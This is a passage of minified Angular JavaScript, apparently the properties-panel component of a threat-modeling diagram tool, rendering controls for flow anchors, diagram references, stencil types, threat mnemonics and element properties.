"),fi(),m(41,"svg",45),s(42,"\n                          "),it(43,"circle",46),s(44,"\n                          "),it(45,"line",47),s(46,"\n                          "),it(47,"line",48),s(48,"\n                        "),u(),s(49,"\n                      "),u(),s(50,"\n                    "),u(),s(51,"\n                    "),ln(),m(52,"td",49),s(53),oe(54,"translate"),u(),s(55,"\n                    "),m(56,"td"),s(57,"\n                      "),m(58,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.East}))}),s(59,"\n                        "),fi(),m(60,"svg",45),s(61,"\n                          "),it(62,"circle",46),s(63,"\n                          "),it(64,"line",47),s(65,"\n                          "),it(66,"line",48),s(67,"\n                        "),u(),s(68,"\n                      "),u(),s(69,"\n                    "),u(),s(70,"\n                  "),u(),s(71,"\n                  "),ln(),m(72,"tr"),s(73,"\n                    "),m(74,"td"),s(75,"\n                      "),ne(76,ldt,11,2,"button",42),s(77,"\n                    "),u(),s(78,"\n                    "),m(79,"td",43),s(80,"\n                      "),m(81,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.South}))}),s(82,"\n                        "),fi(),m(83,"svg",45),s(84,"\n                          "),it(85,"circle",46),s(86,"\n                          "),it(87,"line",47),s(88,"\n                          "),it(89,"line",48),s(90,"\n                        "),u(),s(91,"\n                      "),u(),s(92,"\n                    "),u(),s(93,"\n                    "),ln(),m(94,"td"),s(95,"\n                      "),ne(96,ddt,11,2,"button",42),s(97,"\n                    "),u(),s(98,"\n                  "),u(),s(99,"\n                "),u(),s(100,"\n              "),u(),s(101,"\n              "),m(102,"div",50),s(103,"\n                "),m(104,"table"),s(105,"\n                  "),m(106,"tr"),s(107,"\n                    "),m(108,"td"),s(109,"\n                      "),ne(110,mdt,11,2,"button",42),s(111,"\n                    "),u(),s(112,"\n                    "),m(113,"td",43),s(114,"\n                      "),m(115,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.North}))}),s(116,"\n                        "),fi(),m(117,"svg",45),s(118,"\n                          "),it(119,"circle",46),s(120,"\n                          "),it(121,"line",47),s(122,"\n                          "),it(123,"line",48),s(124,"\n                        "),u(),s(125,"\n                      "),u(),s(126,"\n                    "),u(),s(127,"\n                    "),ln(),m(128,"td"),s(129,"\n                      "),ne(130,udt,11,2,"button",42),s(131,"\n                    "),u(),s(132,"\n                  "),u(),s(133,"\n                  "),m(134,"tr"),s(135,"\n                    "),m(136,"td"),s(137,"\n                      "),m(138,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.West}))}),s(139,"\n                        "),fi(),m(140,"svg",45),s(141,"\n                          "),it(142,"circle",46),s(143,"\n                          "),it(144,"line",47),s(145,"\n                          "),it(146,"line",48),s(147,"\n                        "),u(),s(148,"\n                      "),u(),s(149,"\n                    "),u(),s(150,"\n                    "),ln(),m(151,"td",49),s(152),oe(153,"translate"),u(),s(154,"\n                    "),m(155,"td"),s(156,"\n                      "),m(157,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.East}))}),s(158,"\n                        "),fi(),m(159,"svg",45),s(160,"\n                          "),it(161,"circle",46),s(162,"\n                          "),it(163,"line",47),s(164,"\n                          "),it(165,"line",48),s(166,"\n                        "),u(),s(167,"\n                      "),u(),s(168,"\n                    "),u(),s(169,"\n                  "),u(),s(170,"\n                  "),ln(),m(171,"tr"),s(172,"\n                    "),m(173,"td"),s(174,"\n                      "),ne(175,hdt,11,2,"button",42),s(176,"\n                    "),u(),s(177,"\n                    "),m(178,"td",43),s(179,"\n                      "),m(180,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.South}))}),s(181,"\n                        "),fi(),m(182,"svg",45),s(183,"\n                          "),it(184,"circle",46),s(185,"\n                          "),it(186,"line",47),s(187,"\n                          "),it(188,"line",48),s(189,"\n                        "),u(),s(190,"\n                      "),u(),s(191,"\n                    "),u(),s(192,"\n                    "),ln(),m(193,"td"),s(194,"\n                      "),ne(195,fdt,11,2,"button",42),s(196,"\n                    "),u(),s(197,"\n                  "),u(),s(198,"\n                "),u(),s(199,"\n              "),u(),s(200,"\n              "),m(201,"button",51),he("click",function(){return be(e),Me(B(4).flowMenuIsOpen=!1)}),oe(202,"translate"),s(203,"\n                "),fi(),m(204,"svg",52),s(205,"\n                  "),it(206,"circle",53),s(207,"\n                  "),it(208,"line",54),s(209,"\n                  "),it(210,"line",55),s(211,"\n                "),u(),s(212,"\n              "),u(),s(213,"\n            "),u(),s(214,"\n          ")}if(2&t){const e=B(4);C(1),Ct("flowAnchorOverlay-dark",e.theme.IsDarkMode)("flowAnchorOverlay-light",!e.theme.IsDarkMode),C(2),Ct("flowAnchorOverlay-dark",e.theme.IsDarkMode)("flowAnchorOverlay-light",!e.theme.IsDarkMode),C(8),V("ngIf",8==e.AnchorCount),C(11),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(7),V("ngIf",8==e.AnchorCount),C(14),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(6),ct("\n                      ",re(54,43,"properties.Sender"),"\n                    "),C(11),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(10),V("ngIf",8==e.AnchorCount),C(11),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(7),V("ngIf",8==e.AnchorCount),C(6),Ct("flowAnchorOverlay-dark",e.theme.IsDarkMode)("flowAnchorOverlay-light",!e.theme.IsDarkMode),C(8),V("ngIf",8==e.AnchorCount),C(11),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(7),V("ngIf",8==e.AnchorCount),C(14),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(6),ct("\n                      ",re(153,45,"properties.Receiver"),"\n                    "),C(11),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(10),V("ngIf",8==e.AnchorCount),C(11),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0)),C(7),V("ngIf",8==e.AnchorCount),C(6),at("matTooltip",re(202,47,"general.Close")),C(5),Rt("stroke",e.theme.IsDarkMode?"white":"black")("fill",e.theme.IsDarkMode?"#333333":"#e7e5e5"),C(2),Rt("stroke",e.theme.IsDarkMode?"white":"black"),C(2),Rt("stroke",e.theme.IsDarkMode?"white":"black")}}function _dt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n          "),m(2,"button",24,25),he("click",function(){return be(e),Me(B(3).flowMenuIsOpen=!0)}),oe(4,"translate"),s(5,"\n            "),fi(),m(6,"svg",26),s(7,"\n              "),ne(8,adt,1,1,"circle",27),s(9,"\n              "),ne(10,ndt,1,1,"circle",28),s(11,"\n              "),ne(12,odt,1,1,"circle",29),s(13,"\n              "),ne(14,rdt,1,1,"circle",30),s(15,"\n            \n              "),it(16,"circle",31),s(17,"\n              "),it(18,"circle",32),s(19,"\n              "),it(20,"circle",33),s(21,"\n              "),it(22,"circle",34),s(23,"\n            "),u(),s(24,"\n          "),u(),s(25,"\n          "),s(26,"\n          "),ne(27,pdt,215,49,"ng-template",35),s(28,"\n          "),ln(),m(29,"button",22),he("click",function(){return be(e),Me(B(3).ChangeDataFlowDirection())}),s(30),oe(31,"translate"),u(),s(32,"\n        "),Mt()}if(2&t){const e=Ti(3),i=B(3);C(2),at("matTooltip",re(4,12,"properties.FlowAnchor")),C(6),V("ngIf",8==i.AnchorCount),C(2),V("ngIf",8==i.AnchorCount),C(2),V("ngIf",8==i.AnchorCount),C(2),V("ngIf",8==i.AnchorCount),C(2),Rt("fill",i.GetIconColor()),C(2),Rt("fill",i.GetIconColor()),C(2),Rt("fill",i.GetIconColor()),C(2),Rt("fill",i.GetIconColor()),C(5),V("cdkConnectedOverlayOrigin",e)("cdkConnectedOverlayOpen",i.flowMenuIsOpen),C(3),ke(re(31,14,"properties.DataFlowChangeDirection"))}}function gdt(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){be(e);const n=B().$implicit;return Me(B(2).OnDiagramReference(n))}),s(1),u()}if(2&t){const e=B().$implicit,i=B(2);C(1),ke(i.GetDiagramReference(e))}}function Cdt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ke(e.Name)}}function ydt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,Cdt,2,2,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetAvailableDataFlowDiagrams())}}function bdt(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){be(e);const n=B().$implicit;return Me(B(2).OnDiagramReference(n))}),s(1),u()}if(2&t){const e=B().$implicit,i=B(2);C(1),ke(i.GetDiagramReference(e))}}function Mdt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ke(e.Name)}}function vdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,Mdt,2,2,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetAvailableDiagrams())}}function Adt(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){be(e);const n=B().$implicit;return Me(B(2).OnElementName(n))}),s(1),u()}if(2&t){const e=B().$implicit,i=B(2);C(1),ke(i.GetElementName(e))}}function Tdt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ke(re(2,2,i.GetFlowTypeName(e)))}}function Edt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,Tdt,3,4,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);Ct("disable",!e.Editable),V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetFlowTypes())}}function Ddt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ke(e.Name)}}function xdt(t,a){if(1&t&&(m(0,"optgroup",58),s(1,"\n            "),ne(2,Ddt,2,2,"option",20),s(3,"\n          "),u()),2&t){const e=a.$implicit,i=B(4);V("label",e.Name),C(2),V("ngForOf",i.GetAvailableInterfaces(e))}}function wdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetInterface(r,n.target.value))}),s(1,"\n          "),s(2,"\n          "),m(3,"option"),s(4),oe(5,"translate"),u(),s(6,"\n          "),ne(7,xdt,4,2,"optgroup",57),s(8,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);let n;V("ngModel",null==(n=i.GetValue(e))?null:n.ID),C(4),ke(re(5,3,"properties.selectNone")),C(3),V("ngForOf",i.GetAvailableDevices())}}function Idt(t,a){if(1&t&&(m(0,"mat-option",63),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e.Name)}}function Rdt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n          "),m(2,"mat-select",59),he("selectionChange",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.value))}),s(3,"\n            "),m(4,"input",60),he("keyup",function(n){be(e);const r=B().$implicit,c=B(2);return Me(c.OnSearchMyData(n,c.GetValue(r)))}),oe(5,"translate"),u(),s(6,"\n            "),ne(7,Idt,2,2,"mat-option",61),s(8,"\n          "),u(),s(9,"\n          "),m(10,"button",62),he("click",function(){be(e);const n=B().$implicit;return Me(B(2).AddMyData(n))}),oe(11,"translate"),s(12,"\n            "),m(13,"mat-icon"),s(14,"add"),u(),s(15,"\n          "),u(),s(16,"\n        "),Mt()}if(2&t){const e=B().$implicit,i=B(2);C(2),V("disabled",!e.Editable)("value",i.GetValue(e)),C(2),at("placeholder",re(5,5,"general.Search")),C(3),V("ngForOf",i.GetMyDatas()),C(3),at("matTooltip",re(11,7,"general.Add"))}}function Sdt(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",64),he("change",function(){be(e);const n=B().$implicit;return Me(B(2).SetImpactCategory(n))}),u()}if(2&t){const e=B().$implicit;V("checked",B(2).GetImpactCategory(e))}}function kdt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ke(re(2,2,i.GetLineTypeName(e)))}}function Pdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,kdt,3,4,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);Ct("disable",!e.Editable),V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetLineTypes())}}function Odt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function Ndt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,Odt,3,4,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);Ct("disable",!e.Editable),V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetLMHValues())}}function Ldt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ke(e.Name)}}function zdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetPhysicalElement(r,n.target.value))}),s(1,"\n          "),ne(2,Ldt,2,2,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);let n;V("ngModel",null==(n=i.GetValue(e))?null:n.ID),C(2),V("ngForOf",i.GetAvailablePhysicalElements(i.selectedObject))}}function Wdt(t,a){if(1&t){const e=Ye();m(0,"input",65),he("input",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),u()}if(2&t){const e=B().$implicit,i=B(2);V("spellcheck",i.dataService.HasSpellCheck)("value",i.GetValue(e))("disabled",!e.Editable)}}function Fdt(t,a){if(1&t&&(m(0,"mat-option",63),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e.Name)}}function Vdt(t,a){if(1&t){const e=Ye();m(0,"mat-select",66),he("selectionChange",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.value))}),s(1,"\n          "),ne(2,Fdt,2,2,"mat-option",61),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);V("value",i.GetValue(e)),C(2),V("ngForOf",i.GetProtocols())}}function Bdt(t,a){if(1&t){const e=Ye();m(0,"button",67),he("click",function(){return be(e),Me(B(3).OpenNotes())}),s(1),oe(2,"translate"),u()}if(2&t){const e=B(3);V("matBadge",e.NotesBadge())("matBadgeHidden",0==e.NotesBadge().length),C(1),ke(re(2,3,"properties.openNotes"))}}function Hdt(t,a){if(1&t){const e=Ye();m(0,"button",67),he("click",function(){return be(e),Me(B(3).OpenQuestionnaire())}),s(1),oe(2,"translate"),u()}if(2&t){const e=B(3);V("matBadge",e.QuestionnaireBadge())("matBadgeHidden",0==e.QuestionnaireBadge().length),C(1),ke(re(2,3,"properties.openQuestionnaire"))}}function Udt(t,a){if(1&t&&(m(0,"option",21),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ke(e.Name)}}function qdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetType(r,n.target.value))}),s(1,"\n          "),ne(2,Udt,2,2,"option",20),s(3,"\n        "),u()}if(2&t){const e=B(3);V("ngModel",e.GetStencilType()),C(2),V("ngForOf",e.GetAvailableTypes(e.selectedObject))}}function Gdt(t,a){if(1&t){const e=Ye();m(0,"textarea",68),he("input",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),u()}if(2&t){const e=B().$implicit,i=B(2);V("spellcheck",i.dataService.HasSpellCheck)("value",i.GetValue(e))("disabled",!e.Editable)}}function jdt(t,a){if(1&t){const e=Ye();m(0,"input",65),he("input",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),u()}if(2&t){const e=B().$implicit,i=B(2);V("spellcheck",i.dataService.HasSpellCheck)("value",i.GetValue(e))("disabled",!e.Editable)}}function Qdt(t,a){if(1&t){const e=Ye();m(0,"input",65),he("input",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),u()}if(2&t){const e=B().$implicit,i=B(2);Ct("invalid",i.GetValidator(e)),V("spellcheck",i.dataService.HasSpellCheck)("value",i.GetValue(e))("disabled",!e.Editable)}}function $dt(t,a){if(1&t&&(m(0,"tr"),s(1,"\n      "),m(2,"td")(3,"span",7),oe(4,"translate"),s(5),oe(6,"translate"),u()(),s(7,"\n      "),m(8,"td"),s(9,"\n        "),s(10,"\n        "),ne(11,Jlt,4,4,"select",8),s(12,"\n        "),s(13,"\n        "),ne(14,Zlt,3,3,"button",9),s(15,"\n        "),s(16,"\n        "),ne(17,edt,1,2,"mat-checkbox",10),s(18,"\n        "),s(19,"\n        "),ne(20,idt,4,4,"select",8),s(21,"\n        "),s(22,"\n        "),ne(23,_dt,33,16,"ng-container",6),s(24,"\n        "),s(25,"\n        "),ne(26,gdt,2,1,"button",11),s(27,"\n        "),ne(28,ydt,4,2,"select",12),s(29,"\n        "),s(30,"\n        "),ne(31,bdt,2,1,"button",11),s(32,"\n        "),ne(33,vdt,4,2,"select",12),s(34,"\n        "),s(35,"\n        "),ne(36,Adt,2,1,"button",11),s(37,"\n        "),s(38,"\n        "),ne(39,Edt,4,4,"select",8),s(40,"\n        "),s(41,"\n        "),ne(42,wdt,9,5,"select",12),s(43,"\n        "),s(44,"\n        "),ne(45,Rdt,17,9,"ng-container",6),s(46,"\n        "),s(47,"\n        "),ne(48,Sdt,1,1,"mat-checkbox",13),s(49,"\n        "),s(50,"\n        "),ne(51,Pdt,4,4,"select",8),s(52,"\n        "),s(53,"\n        "),ne(54,Ndt,4,4,"select",8),s(55,"\n        "),s(56,"\n        "),ne(57,zdt,4,2,"select",12),s(58,"\n        "),s(59,"\n        "),ne(60,Wdt,1,3,"input",14),s(61,"\n        "),s(62,"\n        "),ne(63,Vdt,4,2,"mat-select",15),s(64,"\n        "),s(65,"\n        "),ne(66,Bdt,3,5,"button",16),s(67,"\n        "),s(68,"\n        "),ne(69,Hdt,3,5,"button",16),s(70,"\n        "),s(71,"\n        "),ne(72,qdt,4,2,"select",12),s(73,"\n        "),s(74,"\n        "),ne(75,Gdt,1,3,"textarea",17),s(76,"\n        "),s(77,"\n        "),ne(78,jdt,1,3,"input",14),s(79,"\n        "),s(80,"\n        "),ne(81,Qdt,1,5,"input",18),s(82,"\n      "),u(),s(83,"\n    "),u()),2&t){const e=a.$implicit;C(3),at("matTooltip",re(4,27,e.Tooltip)),C(2),ke(re(6,29,e.DisplayName)),C(6),V("ngIf","Arrow Position"==e.Type),C(3),V("ngIf","Assign Number To Asset"==e.Type),C(3),V("ngIf","Check Box"==e.Type),C(3),V("ngIf","Device Interface Name"==e.Type),C(3),V("ngIf","Data Flow Change Direction"==e.Type),C(3),V("ngIf","Data Flow Diagram Reference"==e.Type&&!e.Editable),C(2),V("ngIf","Data Flow Diagram Reference"==e.Type&&e.Editable),C(3),V("ngIf","Diagram Reference"==e.Type&&!e.Editable),C(2),V("ngIf","Diagram Reference"==e.Type&&e.Editable),C(3),V("ngIf","Element Name"==e.Type),C(3),V("ngIf","Flow Type"==e.Type),C(3),V("ngIf","Interface Element Select"==e.Type),C(3),V("ngIf","Data Select"==e.Type),C(3),V("ngIf","Impact Category"==e.Type),C(3),V("ngIf","Line Type"==e.Type),C(3),V("ngIf","Low Medium High Select"==e.Type),C(3),V("ngIf","Physical Element Select"==e.Type),C(3),V("ngIf","Port Box"==e.Type),C(3),V("ngIf","Protocol Select"==e.Type),C(3),V("ngIf","Open Notes"==e.Type),C(3),V("ngIf","Open Questionnaire"==e.Type),C(3),V("ngIf","Stencil Type"==e.Type),C(3),V("ngIf","Text Area"==e.Type),C(3),V("ngIf","Text Box"==e.Type),C(3),V("ngIf","Text Box Validator"==e.Type)}}function Kdt(t,a){if(1&t){const e=Ye();m(0,"span",70),s(1,"\n            "),m(2,"button",71),he("click",function(){const r=be(e).$implicit;return Me(B(4).AddMnemonicThreat(r))}),s(3),u(),s(4,"\n          "),u()}if(2&t){const e=a.$implicit,i=B(4);C(2),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("primary-color",e.AffectedElementTypes.includes(i.selectedElement.Type.ElementTypeID)),at("matTooltip",i.GetLetterTooltip(e)),C(1),ke(e.Letter)}}function Xdt(t,a){if(1&t&&(m(0,"tr"),s(1,"\n        "),m(2,"td"),s(3),u(),s(4,"\n        "),m(5,"td"),s(6,"\n          "),ne(7,Kdt,5,6,"span",69),s(8,"\n        "),u(),s(9,"\n      "),u()),2&t){const e=a.$implicit;C(3),ke(e.Name),C(4),V("ngForOf",e.Letters)}}function Ydt(t,a){if(1&t&&(bt(0),s(1,"\n      "),ne(2,Xdt,10,2,"tr",5),s(3,"\n    "),Mt()),2&t){const e=B(2);C(2),V("ngForOf",e.GetMnemonics())}}function Jdt(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n      "),m(2,"td",72)(3,"button",22),he("click",function(){return be(e),Me(B(2).CreateUseCaseDiagram())}),s(4),oe(5,"translate"),u()(),s(6,"\n    "),u()}2&t&&(C(4),ke(re(5,1,"properties.createDataFlowDiagram")))}function Zdt(t,a){if(1&t&&(m(0,"table",2),s(1,"\n    "),m(2,"colgroup"),s(3,"\n      "),it(4,"col",3),s(5,"\n      "),it(6,"col",4),s(7,"\n    "),u(),s(8,"\n    "),ne(9,$dt,84,31,"tr",5),s(10,"\n    "),ne(11,Ydt,4,1,"ng-container",6),s(12,"\n    "),ne(13,Jdt,7,3,"tr",6),s(14,"\n  "),u()),2&t){const e=B();C(9),V("ngForOf",e.selectedObject.GetProperties()),C(2),V("ngIf",e.IsDFDElement()),C(2),V("ngIf",e.IsUseCase())}}let TZ=(()=>{class t{constructor(e,i,n,r,c,d,T){this.theme=e,this.dataService=i,this.dialog=n,this.threatEngine=r,this.locStorage=c,this.router=d,this.activatedRoute=T,this.searchCounter=0,this.AnchorDirections=_i,this.flowMenuIsOpen=!1,this.selectedObjectChanged=new Tt,this.openQuestionnaire=new Tt}get Diagram(){return this.dataObject}get AnchorCount(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT);return i&&(e=JSON.parse(i)),e&&this.Diagram&&null!=e[this.Diagram.DiagramType]?e[this.Diagram.DiagramType]:4}get selectedObject(){return this._selectedObject}set selectedObject(e){this._selectedObject=e,this.flowMenuIsOpen=!1,setTimeout(()=>{Array.from(document.getElementsByTagName("textarea")).forEach(i=>{i.style.height="auto",i.style.height=i.scrollHeight.toString()+"px"})},10)}get selectedElement(){return this._selectedObject}get selectedFlow(){return this._selectedObject}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.FocusFirst())}FocusFirst(){const e=document.getElementById("proptable");e&&e.children.length>0&&e.children[1].children.length>0&&e.children[1].children[1].children.length>0&&e.children[1].children[1].children[0].select()}GetValue(e){return"Name"==e.ID?null!=this.selectedObject.Ref?this.selectedObject.Ref.NameRaw:this.selectedObject.NameRaw:this.selectedObject.GetProperty(e.ID)}GetValidator(e){return this.selectedObject[e.Callback]()}SetValue(e,i){this.selectedObject.SetProperty(e.ID,i)}SetType(e,i){if(this.selectedObject instanceof lc){let n=this.dataService.Config.GetStencilTypes().find(r=>r.ID==i);this.selectedObject.SetProperty(e.ID,n)}else console.error("Cant set type of non DFDElement")}SetPhysicalElement(e,i){this.selectedObject instanceof lc&&(this.selectedObject.PhysicalElement=this.dataService.Project.GetDFDElement(i))}GetStencilType(){return this.selectedObject instanceof lc?this.selectedObject.GetProperty("Type").ID:null}GetImpactCategory(e){const i=this.selectedObject.Data[e.ID.split("-")[0]],n=Number(e.ID.split("-")[1]);return i.includes(n)}SetImpactCategory(e){const i=Number(e.ID.split("-")[1]),n=this.selectedObject.Data[e.ID.split("-")[0]],r=n.indexOf(i);r>=0?n.splice(r,1):n.push(i)}GetElementName(e){var i;return null===(i=this.selectedObject.GetProperty(e.ID))||void 0===i?void 0:i.Name}OnElementName(e){let i=this.selectedObject.GetProperty(e.ID);i&&i instanceof Lp&&this.selectedObjectChanged.emit(i)}GetDiagramReference(e){let i=this.selectedObject.GetProperty(e.ID);if(i){let n=this.dataService.Project.GetDiagram(i);if(n)return n.Name}return""}OnDiagramReference(e){let i=this.selectedObject.GetProperty(e.ID);if(i){const n={viewID:i};this.selectedObject.Ref&&(n.elementID=this.selectedObject.Ref.ID),this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:n,replaceUrl:!0})}}GetAvailableDataFlowDiagrams(){const e=this.dataService.Project.FindDiagramOfElement(this.selectedObject.ID);return this.dataService.Project.GetDiagrams().filter(i=>i.ID!=e.ID&&i.DiagramType==xn.DataFlow)}GetAvailableDiagrams(){const e=this.dataService.Project.FindDiagramOfElement(this.selectedObject.ID);return this.dataService.Project.GetDiagrams().filter(i=>i.ID!=e.ID&&i.DiagramType==e.DiagramType)}GetAvailablePhysicalElements(e){return e instanceof v2?this.dataService.Project.GetDFDElements().filter(i=>i.IsPhysical&&i.GetProperty("Type").ElementTypeID==e.GetProperty("Type").ElementTypeID+1):e instanceof M5?this.dataService.Project.GetDFDElements().filter(i=>i.Type.ElementTypeID==Et.PhyTrustArea):[]}GetAvailableDevices(){return this.dataService.Project.GetDevices()}GetAvailableInterfaces(e){return e.HardwareDiagram.Elements.GetChildrenFlat().filter(i=>i.GetProperty("Type").ElementTypeID==Et.Interface)}SetInterface(e,i){this.selectedObject.SetProperty(e.ID,this.dataService.Project.GetDFDElement(i))}GetAvailableTypes(e){return e instanceof lc?this.dataService.Config.GetStencilTypes().filter(i=>i.ElementTypeID==e.GetProperty("Type").ElementTypeID):[]}GetProtocols(){return this.dataService.Config.GetProtocols()}AddMyData(e){let i=this.dataService.Project.CreateMyData(null);this.dialog.OpenAddMyDataDialog(i).subscribe(n=>{if(n){let r=this.selectedObject.GetProperty(e.ID);r.push(i),this.selectedObject.SetProperty(e.ID,r)}else this.dataService.Project.DeleteMyData(i)})}GetMyDatas(){return null==this.myDatas&&(this.myDatas=this.dataService.Project.GetMyDatas()),this.myDatas}OnSearchMyData(e,i){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.myDatas=null,this.GetMyDatas();const n=e.target.value.toLowerCase();this.myDatas=this.myDatas.filter(r=>i.includes(r)||r.Name.toLowerCase().includes(n))}},250)}GetFlowTypes(){return DG.GetKeys()}GetFlowTypeName(e){return DG.ToString(e)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}GetLineTypes(){return TG.GetKeys()}GetLineTypeName(e){return TG.ToString(e)}GetArrowPositions(){return EG.GetKeys()}GetArrowPositionName(e){return EG.ToString(e)}GetDeviceInterfaceNames(){return class _we{static GetKeys(){return[So.None,So.HumanInterface,So.MachineInterface,So.Environment]}}.GetKeys()}GetMnemonics(){return this.dataService.Config.GetStencilThreatMnemonics()}GetLetterTooltip(e){var i;let n=e.Name;return(null===(i=e.Description)||void 0===i?void 0:i.length)>0&&(n+="\n\n"+e.Description),n}AddMnemonicThreat(e){this.threatEngine.AddMnemonicThreat(this.selectedElement,e)}AssignNumberToAsset(){const e=this.selectedObject;e.IsNewAsset=!0,e.Number=0==this.dataService.Project.GetNewAssets().length?"1":(Math.max(...this.dataService.Project.GetNewAssets().map(i=>Number(i.Number)).filter(i=>!isNaN(i)))+1).toString()}ChangeDataFlowDirection(){this.selectedElement.ChangeDirection()}OpenNotes(){this.dialog.OpenNotesDialog(this.selectedObject.Notes,!0,!1,!0,!0)}OpenQuestionnaire(){this.openQuestionnaire.emit(this.selectedObject)}QuestionnaireBadge(){if(this.selectedObject instanceof rf&&this.selectedObject.IsActive){const e=Object.values(this.selectedObject.ThreatQuestions).filter(i=>null==i).length;if(e>0)return e.toString()}return""}NotesBadge(){if(this.selectedObject instanceof rf){const e=this.selectedObject.Notes.length;if(e>0)return e.toString()}return""}CreateUseCaseDiagram(){let e=this.dataService.Project.CreateDiagram(xn.DataFlow);e.Name=this.selectedObject.Name,this.selectedObject.DataFlowDiagramID=e.ID,setTimeout(()=>{this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:{viewID:e.ID},replaceUrl:!0})},500)}GetIconColor(e=!1){return e?this.theme.Primary:this.theme.IsDarkMode?"#FFF":"#000"}IsDFDElement(){return this.selectedObject instanceof lc}IsComponent(){return this.selectedObject instanceof rf}IsUseCase(){return this.selectedObject instanceof 